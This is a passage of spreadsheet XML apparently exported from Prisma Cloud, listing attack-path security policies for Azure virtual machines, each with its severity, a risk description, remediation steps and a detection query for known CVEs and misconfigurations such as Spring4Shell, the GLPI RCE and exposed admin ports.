Detecting attempts to exploit this vulnerability underscores the urgency of assessing and securing affected applications to prevent successful attacks. The exploitation of CVE-2021-39144 could lead to significant security incidents, including unauthorized execution of code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CVE-2021-39144 vulnerability on affected Azure VM instances. This includes applying security patches, reviewing access controls, and conducting thorough audits to prevent unauthorized code execution. Taking swift measures to address this vulnerability will help protect against unauthorized access and maintain the trust and confidence of stakeholders.</t>
        </is>
      </c>
      <c r="X2605" t="inlineStr">
        <is>
          <t>[Vulnerability]
1. Identify and access the reported resource affected by CVE-2021-39144
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
https://nvd.nist.gov/vuln/detail/CVE-2021-39144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605" t="inlineStr"/>
      <c r="Z2605" t="inlineStr">
        <is>
          <t>asset WHERE asset.type = 'azure-vm-list' and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-39144 - Unsafe Deserialization in XStream) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-39144'))</t>
        </is>
      </c>
      <c r="AA2605" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2605" t="inlineStr">
        <is>
          <t>2024-05-23 08:56:28</t>
        </is>
      </c>
      <c r="AC2605" t="inlineStr"/>
      <c r="AD2605" t="b">
        <v>1</v>
      </c>
      <c r="AE2605" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2605" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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5" t="inlineStr">
        <is>
          <t>d9dfa891-92f5-4869-87a6-72dced5eb069</t>
        </is>
      </c>
      <c r="AI2605" t="inlineStr">
        <is>
          <t>68cf5539-c1f8-49a1-a76f-a9a7ac7a2fdd</t>
        </is>
      </c>
      <c r="AJ2605" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2605" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2606">
      <c r="A2606" t="inlineStr"/>
      <c r="B2606" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2606" s="2" t="inlineStr"/>
      <c r="D2606" t="inlineStr"/>
      <c r="E2606" t="inlineStr"/>
      <c r="F2606" t="inlineStr"/>
      <c r="G2606" t="b">
        <v>1</v>
      </c>
      <c r="H26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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2606" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2606" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [GLPI Project, CVE-2022-35914]</t>
        </is>
      </c>
      <c r="L2606" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2606" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2606" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2606" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2606" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2606" t="inlineStr"/>
      <c r="R2606" t="inlineStr"/>
      <c r="S2606" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2606" t="b">
        <v>0</v>
      </c>
      <c r="U2606" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2606" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2606" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to Remote Code Execution (RCE) with exploits in the wild[GLPI Project, CVE-2022-35914].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of GLPI Project software installed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the GLPI Project RCE [CVE-2022-35914] vulnerability reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X2606"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CVE-2022-35914
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-35914</t>
        </is>
      </c>
      <c r="Y2606" t="inlineStr"/>
      <c r="Z2606" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2022-35914 - GLPI Project RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2022-35914'))</t>
        </is>
      </c>
      <c r="AA2606" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2606" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:43</t>
        </is>
      </c>
      <c r="AC2606" t="inlineStr"/>
      <c r="AD2606" t="b">
        <v>1</v>
      </c>
      <c r="AE2606" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2606" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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6" t="inlineStr">
        <is>
          <t>612f59df-62e4-497c-8247-8fec67defe4f</t>
        </is>
      </c>
      <c r="AI2606" t="inlineStr">
        <is>
          <t>d0bdace6-0f02-49d1-ae72-fdd79ffc0d27</t>
        </is>
      </c>
      <c r="AJ2606" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2606" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2607">
      <c r="A2607" t="inlineStr"/>
      <c r="B2607" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2607" s="2" t="inlineStr"/>
      <c r="D2607" t="inlineStr"/>
      <c r="E2607" t="inlineStr"/>
      <c r="F2607" t="inlineStr"/>
      <c r="G2607" t="b">
        <v>1</v>
      </c>
      <c r="H26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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2607" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2607" t="inlineStr">
        <is>
          <t>Brute force attack and privilege escalation risk on a publicly exposed Azure Virtual Machine with risky Key Vault management access</t>
        </is>
      </c>
      <c r="L2607" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2607" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2607" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2607" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2607" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2607" t="inlineStr"/>
      <c r="R2607" t="inlineStr"/>
      <c r="S2607" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2607" t="b">
        <v>0</v>
      </c>
      <c r="U2607" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2607" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2607" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed, use basic authentication instead of SSH keys, and have Key vault management access (data access is not included).
Publicly exposed Azure Virtual Machine with basic authentication enable bad actors to use brute force on a system to gain unauthorized access. Virtual Machines with Key vault management access permissions could further expand the surface of the attack and grant access to cloud resources with sensitive information.
Immediate attention is required to grant the least privileges and remove unwanted risky permissions assigned to the Virtual Machine, ensure the Azure Virtual Machine uses SSH Key authentication instead of basic authentication, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2607"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[MISCONFIGURATION]
To configure existing Azure Virtual machine with SSH key authentication, Follow below URL:
https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/vmaccess#update-ssh-key
If changes are not reflecting you may need to take backup, You may need to create new virtual machine with SSH key based authentication and delete the reported virtual machine.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2607" t="inlineStr"/>
      <c r="Z2607" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure Virtual Machine (Linux) does not authenticate using SSH keys','Azure VM instance associated managed identities with Key Vault management access (data access is not included)')</t>
        </is>
      </c>
      <c r="AA2607" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2607" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:02</t>
        </is>
      </c>
      <c r="AC2607" t="inlineStr"/>
      <c r="AD2607" t="b">
        <v>1</v>
      </c>
      <c r="AE2607" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2607" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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7" t="inlineStr">
        <is>
          <t>9e092b29-1b5e-40b0-bf40-46a6bc293d38</t>
        </is>
      </c>
      <c r="AI2607" t="inlineStr">
        <is>
          <t>02606229-f2ab-4e9d-a030-8b816a3786ee</t>
        </is>
      </c>
      <c r="AJ2607" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2607" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2608">
      <c r="A2608" t="inlineStr"/>
      <c r="B2608" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2608" s="2" t="inlineStr"/>
      <c r="D2608" t="inlineStr"/>
      <c r="E2608" t="inlineStr"/>
      <c r="F2608" t="inlineStr"/>
      <c r="G2608" t="b">
        <v>1</v>
      </c>
      <c r="H26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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2608" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2608" t="inlineStr">
        <is>
          <t>Remote command execution risk due to publicly exposed admin ports on Azure Virtual Machine with Run command permissions</t>
        </is>
      </c>
      <c r="L2608" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2608" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2608" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2608" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2608" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2608" t="inlineStr"/>
      <c r="R2608" t="inlineStr"/>
      <c r="S2608" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2608" t="b">
        <v>0</v>
      </c>
      <c r="U2608" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2608" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2608" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have risky run command permissions
Run command execution permissions on publicly exposed Virtual Machines with unrestricted access to admin ports (SSH / RDP) may allow an attacker to gain access to the Virtual Machines and could allow attackers to execute scripts or commands on the virtual machine and laterally move across cloud accounts.
This policy checks for the following risky permissions:
'Microsoft.Compute/virtualMachines/runCommands/write', 'Microsoft.Compute/virtualMachines/runCommand/action'
Immediate attention is required to review run command execution permissions and remove them if are not intended. Restrict public exposure of admin ports reported for the Virtual Machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2608"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for ports (tcp/22, tcp/3389) 
6. Set the 'Source' to the 'IP addresses' and enter trusted IP address or CIDR range in 'Source IP addresses/CIDR ranges'
7. Click 'Save' to apply the changes
[PERMISSION]
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if necessary</t>
        </is>
      </c>
      <c r="Y2608" t="inlineStr"/>
      <c r="Z2608" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0) on Admin ports','Azure VM instance with Run command permissions')</t>
        </is>
      </c>
      <c r="AA2608" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2608" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:05</t>
        </is>
      </c>
      <c r="AC2608" t="inlineStr"/>
      <c r="AD2608" t="b">
        <v>1</v>
      </c>
      <c r="AE2608" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2608" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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8" t="inlineStr">
        <is>
          <t>5dca0a43-7a69-4a46-a3c6-fffe9bca6f94</t>
        </is>
      </c>
      <c r="AI2608" t="inlineStr">
        <is>
          <t>ac988857-93c1-4971-b721-76cd6023afa6</t>
        </is>
      </c>
      <c r="AJ2608" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2608" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2609">
      <c r="A2609" t="inlineStr"/>
      <c r="B2609" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2609" s="2" t="inlineStr"/>
      <c r="D2609" t="inlineStr"/>
      <c r="E2609" t="inlineStr"/>
      <c r="F2609" t="inlineStr"/>
      <c r="G2609" t="b">
        <v>1</v>
      </c>
      <c r="H26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09" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2609" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2609" t="inlineStr">
        <is>
          <t>Potentially nefarious backdoor activity detected on a publicly exposed and vulnerable Azure Virtual Machine</t>
        </is>
      </c>
      <c r="L2609" t="inlineStr">
        <is>
          <t>MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2609" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2609" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2609" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2609" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2609" t="inlineStr"/>
      <c r="R2609" t="inlineStr"/>
      <c r="S2609" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2609" t="b">
        <v>0</v>
      </c>
      <c r="U2609" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2609" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2609" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and connected to remote systems known for backdoor activities, and have critical or high vulnerabilities.
A backdoor provides unauthorized remote access to instances with malware installed while bypassing the authentication mechanisms in place. Attackers can exploit these vulnerabilities to compromise the confidentiality, integrity, and availability of the affected virtual machine, and perform malicious actions. Publicly exposed and exploitable virtual machines with network connectivity to remote systems known for backdoor activity indicate that the instance may already be under attack or has been compromised.
Immediate attention is required to investigate the backdoor activity, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2609"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09" t="inlineStr"/>
      <c r="Z2609" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') and ('Traffic to a suspicious IP address associated with Backdoor activity' or 'Traffic from a suspicious IP address associated with Backdoor activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2609" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2609" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC2609" t="inlineStr"/>
      <c r="AD2609" t="b">
        <v>1</v>
      </c>
      <c r="AE2609" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2609" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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09" t="inlineStr">
        <is>
          <t>190aac90-241b-4f23-9612-c09a2401026b</t>
        </is>
      </c>
      <c r="AI2609" t="inlineStr">
        <is>
          <t>6dbfb3a5-0d4a-4d0d-b649-686bb373d205</t>
        </is>
      </c>
      <c r="AJ2609" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2609" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2610">
      <c r="A2610" t="inlineStr"/>
      <c r="B2610" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2610" s="2" t="inlineStr"/>
      <c r="D2610" t="inlineStr"/>
      <c r="E2610" t="inlineStr"/>
      <c r="F2610" t="inlineStr"/>
      <c r="G2610" t="b">
        <v>1</v>
      </c>
      <c r="H26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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2610" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2610" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) risk due to a publicly exposed Azure Virtual Machine with Spring4Shell vulnerability</t>
        </is>
      </c>
      <c r="L2610" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2610" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2610" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2610" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2610" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2610" t="inlineStr"/>
      <c r="R2610" t="inlineStr"/>
      <c r="S2610" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2610" t="b">
        <v>0</v>
      </c>
      <c r="U2610" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2610" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2610" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines which have Spring4Shell vulnerabilities and are publicly exposed.
The Spring4Shell vulnerability allows attackers to exploit the web server pathway, making all connected applications vulnerable to Remote Code Execution (RCE). Spring4Shell vulnerability is very critical and can compromise the confidentiality, integrity, and availability of data managed by a vulnerable application virtual machine. The fact that the virtual machine is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Spring4Shell vulnerabilities [CVE-2022-22965 and CVE-2022-22963] and public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2610"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610" t="inlineStr"/>
      <c r="Z2610" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-22963', 'CVE-2022-22965'))</t>
        </is>
      </c>
      <c r="AA2610" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2610" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2610" t="inlineStr"/>
      <c r="AD2610" t="b">
        <v>1</v>
      </c>
      <c r="AE2610" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2610" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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0" t="inlineStr">
        <is>
          <t>6909f1d6-3235-4c6e-9a87-788fe62fba71</t>
        </is>
      </c>
      <c r="AI2610" t="inlineStr">
        <is>
          <t>9c246301-15f4-4167-8130-53a4b59db49d</t>
        </is>
      </c>
      <c r="AJ2610" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2610" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2611">
      <c r="A2611" t="inlineStr"/>
      <c r="B2611" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2611" s="2" t="inlineStr"/>
      <c r="D2611" t="inlineStr"/>
      <c r="E2611" t="inlineStr"/>
      <c r="F2611" t="inlineStr"/>
      <c r="G2611" t="b">
        <v>1</v>
      </c>
      <c r="H26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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2611" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2611" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine (ReportLab, CVE-2023-33733)</t>
        </is>
      </c>
      <c r="L2611" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2611" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2611" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2611" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2611" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2611" t="inlineStr"/>
      <c r="R2611" t="inlineStr"/>
      <c r="S2611" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2611" t="b">
        <v>0</v>
      </c>
      <c r="U2611" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2611" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2611" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-33733).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ReportLab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ReportLab (CVE-2023-33733) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2611"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CVE-2023-33733
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-33733</t>
        </is>
      </c>
      <c r="Y2611" t="inlineStr"/>
      <c r="Z2611" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-33733'))</t>
        </is>
      </c>
      <c r="AA2611" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2611" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:13</t>
        </is>
      </c>
      <c r="AC2611" t="inlineStr"/>
      <c r="AD2611" t="b">
        <v>1</v>
      </c>
      <c r="AE2611" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2611" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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1" t="inlineStr">
        <is>
          <t>bce0d238-601a-4133-9378-5e8fa78bd88f</t>
        </is>
      </c>
      <c r="AI2611" t="inlineStr">
        <is>
          <t>23bf9699-5597-459c-be54-bb74ce53e8c7</t>
        </is>
      </c>
      <c r="AJ2611" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2611" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2612">
      <c r="A2612" t="inlineStr"/>
      <c r="B2612" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2612" s="2" t="inlineStr"/>
      <c r="D2612" t="inlineStr"/>
      <c r="E2612" t="inlineStr"/>
      <c r="F2612" t="inlineStr"/>
      <c r="G2612" t="b">
        <v>1</v>
      </c>
      <c r="H26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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2612" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2612" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine [Apache, CVE-2022-42889]</t>
        </is>
      </c>
      <c r="L2612" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2612" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2612" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2612" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2612" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2612" t="inlineStr"/>
      <c r="R2612" t="inlineStr"/>
      <c r="S2612" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2612" t="b">
        <v>0</v>
      </c>
      <c r="U2612" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2612" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2612" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have known exploitable remote code execution vulnerability [CVE-2022-42889].
Remote code execution vulnerability is a critical security concern that enables unauthorized users to execute arbitrary code on a system, potentially leading to data breaches, system compromise, or unauthorized data manipulation. The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Apache [CVE-2022-42889] vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2612"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2612" t="inlineStr"/>
      <c r="Z2612" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-42889'))</t>
        </is>
      </c>
      <c r="AA2612" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2612" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2612" t="inlineStr"/>
      <c r="AD2612" t="b">
        <v>1</v>
      </c>
      <c r="AE2612" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2612" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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2" t="inlineStr">
        <is>
          <t>bfa3e0bc-b279-4274-a43d-1a41839e3899</t>
        </is>
      </c>
      <c r="AI2612" t="inlineStr">
        <is>
          <t>52024bcd-8d20-4b9b-8751-223cb1539d1a</t>
        </is>
      </c>
      <c r="AJ2612" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2612" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2613">
      <c r="A2613" t="inlineStr"/>
      <c r="B2613" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2613" s="2" t="inlineStr"/>
      <c r="D2613" t="inlineStr"/>
      <c r="E2613" t="inlineStr"/>
      <c r="F2613" t="inlineStr"/>
      <c r="G2613" t="b">
        <v>1</v>
      </c>
      <c r="H26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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2613" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2613" t="inlineStr">
        <is>
          <t>Potential risk of Cerber Ransomware attack on ports 80/443 due to publicly exposed and vulnerable Azure Virtual Machine (Confluence, CVE-2023-22515, CVE-2023-22518)</t>
        </is>
      </c>
      <c r="L2613" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2613" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2613" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2613" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2613" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2613" t="inlineStr"/>
      <c r="R2613" t="inlineStr"/>
      <c r="S2613" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2613" t="b">
        <v>0</v>
      </c>
      <c r="U2613" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2613" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2613" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have a known Cerber Ransomware vulnerability on ports 80/443 associated with Atlassian Confluence (CVE-2023-22515 and CVE-2023-22518).
CVE-2023-22515 is a critical vulnerability with a CVSS base score of 10.0, exploited remotely with low complexity, and does not require any privileges or user interaction. This flaw in Confluence allows attackers to create an account with admin privileges and execute arbitrary code.
CVE-2023-22518 shares several similarities with CVE-2023-22515. It also has a critical CVSS base score of 10.0 and can be easily exploited remotely without requiring any privileges or user interaction.
